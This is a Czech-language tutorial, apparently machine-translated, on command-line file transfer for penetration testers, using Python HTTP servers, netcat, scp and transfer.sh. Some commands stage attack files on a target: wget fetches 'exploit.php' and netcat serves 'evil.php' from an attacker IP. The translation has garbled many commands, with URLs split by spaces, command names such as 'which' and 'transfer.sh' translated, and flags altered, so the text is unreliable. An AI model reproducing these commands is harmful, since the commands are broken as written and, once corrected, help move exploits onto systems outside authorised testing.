Během aktivit penetračního testování je často nutný přenos exploitů, skriptů pythonu a načítacích modulů. Protože terminál je většinou používaný nástroj, je nezbytné porozumět základům přenosu souborů.
Zkoušečka pera by měla být dobře vybavena různými triky pro přenos souborů ze vzdáleného serveru i z jednoho adresáře do druhého. V tomto tutoriálu probereme různé způsoby přenosu souborů pomocí příkazového řádku.
1. Python Server
Python je základní balíček, který je předinstalován téměř ve všech systémech založených na Debianu. Chcete-li přenést soubor z jednoho počítače do druhého, postupujte následovně;
Python2:
Přepněte do adresáře, kde existuje soubor, který chcete přenést. Spusťte jednoduchý pythonový server. Zadejte následující příkaz;
$ python -m SimpleHTTPServer 8080
Nyní přejděte do zařízení, kam chcete soubor přenést. Ke stažení souboru použijte následující příkaz;
$ wget http: // 192.168.43.177: 8080 / soubor
Nezapomeňte nahradit IP, číslo portu a název souboru.
Python3:
Cokoli napsané v python2 se téměř vždy zlomí v python3. Podíváme se tedy také na to, jak přenést soubor pomocí python3.
V případě python3 zadejte následující příkaz pro spuštění jednoduchého serveru python.
$ python3 -m http.server 8080
Chcete-li stáhnout soubor do cíle, zadejte následující příkaz;
$ wget http: // 192.168.43.177: 8080 / exploit.php
2. Netcat
Netcat je výkonný nástroj pro přenos souborů z libovolného vzdáleného počítače na místní počítač. Nemusí to být vždy nainstalováno. Můžete zkontrolovat, zda existuje nebo ne, zadáním;
$ který netcat
Případně zadáním;$ které nc
Vytvořte server netcat pomocí následujícího příkazu;
$ nc -nlvp 8080 < evil.php
Nyní přejděte do cílového počítače a stažením souboru zadejte následující;
$ nc -nv 192.168.43.177 8080> zlo.php
Nahradit nc
s netcat
ve výše uvedených příkazech, pokud nc nefunguje nebo není správně nainstalován.
3. SCP
Secure Copy Protocol je výkonný nástroj pro přenos souborů. Hodí se zvlášť, když chcete přenášet adresáře. Také se většinou používá pro přenos souborů přes ssh.
Pro přenos souboru pomocí ssh zadejte následující příkaz na odesílajícím počítači;
$ scp -i nové.test PEM.py ubuntu @ 18.220.68.229: / home / ubuntu
Kde -i představuje veřejný klíč pro přihlášení ssh, otestujte.py je soubor, který má být přenesen, a / home / ubuntu je cílový adresář, kam chceme soubor uložit.
Chcete-li stáhnout soubor ze vzdáleného počítače, zadejte následující příkaz;
$ scp root @ 192.168.43.177: / remote_directory / file / local / directory
4. Převod.sh
Tento nástroj jiného výrobce můžete použít k přenosu souborů. Může to být užitečné, pokud nemáte stroj s veřejnou IP adresou a stále musíte přenášet soubory. Následující příkaz nahraje soubor do přenosu.servery sh;
$ curl - nahraný soubor ./soubor.txt https: // přenos.sh / soubor.txt
Chcete-li soubor stáhnout, zadejte následující příkaz;
$ curl https: // převod.sh // soubor.soubor txt -o.txt
Převod.sh je stále ve vývoji a nemusí fungovat vždy.
Závěr
Nástroje příkazového řádku nám umožňují přenášet soubory různými způsoby. Mohou vypadat trochu komplikovaně, ale získání praktických zkušeností jim dává možnost snadno spravovat soubory, zvláště když není k dispozici možnost grafického uživatelského rozhraní.